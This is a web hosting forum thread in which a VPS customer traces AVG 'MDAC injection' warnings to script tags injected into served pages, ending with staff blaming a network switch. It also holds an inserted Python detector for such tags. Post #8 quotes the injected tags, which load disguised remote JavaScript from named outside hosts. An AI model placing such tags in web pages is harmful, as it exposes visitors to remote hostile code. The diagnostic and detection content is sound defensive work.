  1. #1

    AVG Virus Warning

    A number of users of a site hosted on my VPS, including myself, have suddenly started receiving warnings from AVG anti-virus that a file is infected:

    FileName : www.batnigt.com/ver.htm

    Threat Name : Exploit MDAC injection (type 26

    I have not updated the site for some time and can find no references to a file so named. The only 3rd party scripts in use are from Yahoo and Google, which I would assume are safe enough.

    I'm unsure how to proceed and wonder if anyone can assist.

    Thanks.


    Alan

  2. #2
    Join Date
    Oct 2006
    Location
    localhost
    Posts
    3,375


    Hi Alan,

    Are there any changes in the file stamps of the default files in your website? i.e. if they have been tampered with by any means, the date/time of the change will be reflected.

    Rock _a.k.a._ Jack

  3. #3


    No, I've checked that and can't see anything that's changed.

    Guess I could do a fresh deployment later and see if that changes anything.

    If not then I assume the issue must be with a 3rd party script or a previously clean file is now being identified as a threat for some reason. AVG have confirmed that the threat exists and is not a false positive.

    Would running a virus scan on the server help, viz. if it doesn't find anything then I could only assume the issue was with some resource served from a 3rd party server?

    Are there any other tools that would help me in identifying this issue?

  4. #4
    Join Date
    Oct 2006
    Location
    localhost
    Posts
    3,375


    Ohh, if it isn't the files, then this can be an issue with the SQL server being infected or maybe it's just Firefox. Did you try using IE?

    Rock _a.k.a._ Jack

  5. #5


    I get the error with both IE and Firefox.

    As far as I'm aware I don't even have SQL Server installed. I'm certainly not using it.



    Alan

  6. #6
    Join Date
    Oct 2006
    Location
    localhost
    Posts
    3,375


    Can you post the name of one of your hosted sites which is throwing the warning here?

    Rock _a.k.a._ Jack

  7. #7


    Ok. I have seen it on:

    www.braids-united.co.uk

    I tried it at work just now and FF was showing a reference to the following in the status bar:

    js.users.51.la

    js.users.51.la - hosts File Entries


    ??



    Alan

  8. #8


    I have received some assistance from AVG who have advised me that

    ----------------------
    Please kindly note that the positive detection is caused by the
    following lines in the page source:

    <script language=javascript
    src=http://telecom.dgnet.net/images/pen.gif></script>;

    <script language=javascript
    src=hxxp://www.jalasoft.com/images/ken.gif></script>;

    If the lines will be removed, then the AVG should stop detecting it.
    ----------------------

    Sure enough, looking at the source of the following page there is a reference to the first item right at the top of the page.

    Membership Details

    Now it's not in the page source so how the hell is it getting there? Some other script I assume but I can't see anything.


  10. #10
    Join Date
    Mar 2007
    Location
    127.0.0.1
    Posts
    1,661


    Sounds like your server has been compromised in some way. Are you sure your scripts aren't insecure in some way?
    Josh

    Resident Blogger

  11. #11


    What scripts are we talking about here? Javascript?

  12. #12
    Join Date
    Mar 2007
    Location
    127.0.0.1
    Posts
    1,661


    Quote Originally Posted by alanhay View Post
    What scripts are we talking about here? Javascript?
    Just your dynamic web pages in general.
    Josh

    Resident Blogger

  13. #13


    I have identified that this is an IIS issue and that my server has been compromised somehow.

    If I serve the pages directly from Tomcat then the problem disappears.

    I will raise a support ticket.
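The pattern described in posts #8 and #13 (script tags pointing at supposed image files that appear at the top of the served page but not in the files on disk, and only when the request goes through IIS rather than straight to Tomcat) can be checked mechanically. The following is an added example, not code from the thread, from AVG or from the hosting provider. It parses HTML, flags any script tag whose src is an external host outside a hypothetical allow-list or whose URL ends in a non-script extension such as .gif, and then diffs the findings between the page as served and the page as stored, so that injections made by the front end rather than on disk stand out. The hostnames `injected.example` and `www.google-analytics.com`, the allow-list, and the two HTML samples are all constructed for the example.

```python
import posixpath
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allow-list: hosts this site is known to load scripts from.
# The Google host is an assumption standing in for the "3rd party scripts
# from Yahoo and Google" mentioned in the thread.
ALLOWED_SCRIPT_HOSTS = {"www.google-analytics.com"}
SCRIPT_EXTENSIONS = {".js"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag.

    html.parser accepts unquoted attribute values, so the
    `src=http://host/images/pen.gif` form quoted by AVG is parsed too.
    """

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def suspicious_scripts(html, own_host):
    """Return [(src, [reasons])] for script tags that look injected."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.srcs:
        parts = urlparse(src)
        host = parts.netloc.lower()
        reasons = []
        # Relative URLs have no netloc and are served from our own host.
        if host and host != own_host.lower() and host not in ALLOWED_SCRIPT_HOSTS:
            reasons.append("external host not on allow-list")
        # A script whose URL ends in .gif/.jpg/... is a classic disguise:
        # the browser runs whatever the server sends regardless of the name.
        ext = posixpath.splitext(parts.path.lower())[1]
        if ext and ext not in SCRIPT_EXTENSIONS:
            reasons.append("non-script extension " + ext)
        if reasons:
            findings.append((src, reasons))
    return findings


def injected_only(served_html, on_disk_html, own_host):
    """Script srcs flagged in the served page but absent from the file on disk."""
    served = {src for src, _ in suspicious_scripts(served_html, own_host)}
    on_disk = {src for src, _ in suspicious_scripts(on_disk_html, own_host)}
    return sorted(served - on_disk)


# Constructed sample input (not captured from the real site):
# the page as stored on disk, or as served directly by Tomcat ...
ON_DISK_HTML = """<html><head><title>Membership Details</title>
<script type="text/javascript" src="/js/site.js"></script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
</head><body><h1>Membership Details</h1></body></html>
"""
# ... and the same page as served by the compromised front end, with a
# script tag prepended at the very top in the unquoted form AVG quoted.
SERVED_HTML = ('<script language=javascript\n'
               'src=http://injected.example/images/pen.gif></script>\n'
               + ON_DISK_HTML)


if __name__ == "__main__":
    own = "www.braids-united.co.uk"
    for src, reasons in suspicious_scripts(SERVED_HTML, own):
        print(src, "->", "; ".join(reasons))
    print("injected only:", injected_only(SERVED_HTML, ON_DISK_HTML, own))
```

In practice you would feed `suspicious_scripts` the body of a real HTTP response and `injected_only` the same file read from the web root (or fetched from Tomcat's port directly); a non-empty result from `injected_only` means the content is being altered between the file and the client, which points at the web server, a handler or module in front of it, or the network path rather than at the site's own scripts.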

  14. #14
    Join Date
    Oct 2006
    Posts
    377


    Hello,

    I would say rather than investigating the current issue and making it further more complicated, I think a quick solution for this problem is to create a brand new VPS and do a fresh installation for all your applications on it. You can then scan the files on your local machine and upload them on the server as per your requirement.

    I know this may seem to be a time consuming task but in this way we can solve this problem permanently. There is a possibility that the Virus may have infected the system files also.

    Let us know if you would like to proceed with this solution.

    Best Regards,
    Sebastian
    Senior System Administrator
    http://www.eukhost.com/

  15. #15


    Well, I have already had one brand new VPS since signing up with you and do not really have the time to go through the whole process again.

    I believe that IIS on my server has been compromised from an external attack. What is to prevent this happening again?

  16. #16
    Join Date
    Sep 2005
    Posts
    6,039


    Hi Alan,

    There seems to be some problem with the Network switch which is connected to the rack of your vps node. We will need to replace the compromised network switch if the problem turns out to be with the switch or else we will need to investigate further.

    Please allow our VPS team to migrate your VPS as there's no other solution to get this problem sorted quickly.

  17. #17


    Okay, so you will reinstall and reconfigure all applications EXACTLY as they are now, backup and restore all data including that in MySQL and Subversion, configure IIS and Tomcat Virtual Hosts etc., MailServer, PHP?

  18. #18
    Join Date
    Sep 2005
    Posts
    6,039


    Quote Originally Posted by alanhay View Post
    Okay, so you will reinstall and reconfigure all applications EXACTLY as they are now, backup and restore all data including that in MySQL and Subversion, configure IIS and Tomcat Virtual Hosts etc., MailServer, PHP?
    Yes. We will make a clone of your existing VPS and restore it as it is on a new node. I'm not sure why it had to be only your VPS twice in a time span of 2 months, but we will try our best to avoid problems for your VPS in future.

  19. #19


    Okay but can you explain:

    "There seems to be some problem with the Network switch which is connected to the rack of your vps node."

    What exactly has happened here? A malicious user has managed to penetrate your network? What is to prevent this happening on the new VPS?

  20. #20
    Join Date
    Mar 2007
    Location
    Planet Earth
    Posts
    162


    Hello,

    Please allow us sometime as we are working on this issue. We will provide you the complete explanation as soon as the issue gets fixed.
    vzAddict || Mike
